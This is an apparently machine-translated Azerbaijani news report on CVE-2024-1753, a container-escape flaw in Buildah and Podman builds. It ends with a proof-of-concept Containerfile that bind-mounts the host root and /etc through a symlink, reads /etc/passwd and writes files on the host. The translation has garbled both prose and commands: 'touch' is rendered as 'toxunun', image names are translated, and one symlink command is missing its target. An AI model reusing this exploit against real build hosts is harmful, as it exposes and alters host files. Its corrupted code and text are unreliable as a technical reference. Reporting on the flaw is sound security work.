Buildah və Podman paketlərində kök imtiyazları ilə işləyən konteynerin qurulma mərhələsində host mühitinin fayl sisteminə tam giriş imkanı verən bir zəiflik (CVE-2024-1753) aşkar edilmişdir. SE aktivləşdirilmiş sistemlərdəLinux Host fayl sisteminə giriş yalnız oxuma rejimi ilə məhdudlaşır. Düzəliş hazırda yamaq kimi mövcuddur və bu yaxınlarda Buildah kod bazasına qəbul edilib.
Zəiflik ondan irəli gəlir ki, RUN mərhələsində quraşdırma zamanı “mount —bind” əmrindən istifadə edərək fayl sisteminin hissələrini quraşdırarkən mənbə kataloqu ilə arqument (“mənbə=” parametri) yoxlanılmır. kök fayl sistemində varsa. Təcavüzkar tərəfindən hazırlanmış Konteyner faylı konfiqurasiya faylı mənbə montaj qovluğunun kök fayl sisteminə simvolik keçid kimi formatlaşdırıldığı konteyner təsvirindən istifadə edə bilər. Bu halda, quraşdırma əməliyyatı host mühitinin kök fayl sisteminin konteynerin içərisinə quraşdırılmasına gətirib çıxaracaq ki, bu da RUN mərhələsində host mühitinin fayl sisteminə tam giriş əldə etməyə və iş zamanı konteynerdən çıxışı təşkil etməyə imkan verəcəkdir. “buildah build” və ya “podman build” əmrlərindən istifadə edərək qurun.
“podman build -f ~/Containerfile” əmri ilə qurulan zərərli Konteyner faylının nümunəsi. /etc/passwd məzmununu göstərəcək və host mühitində /BIND_BREAKEOUT və /etc/BIND_BREAKOUT2 fayllarını yaradacaq: FROM alpdən əsas kimi RUN ln -s / /rootdir RUN ln -s /etc2 FROM alp RUN echo “ls konteyner kökü " RUN ls -l / RUN echo "Exploit ilə konteynerin kökünü deyil, hostun kökünü göstərin və hostda /BIND_BREAKOUT yaradın" RUN —mount=type=bind,from=base,source=/rootdir,destination =/ exploit,rw ls -l /exploit; toxunun /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo "Konteynerin deyil, istismar şousu hostu /etc/passwd ilə və hostda /etc daxilində /BIND_BREAKOUT2 yaradın" RUN —mount=type=bind,rw,source=/etc2,destination=/ etc2,from=baza ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; /etc2/BIND_BREAKOUT2 toxunun; ls -l /etc2
Mənbə: opennet.ru
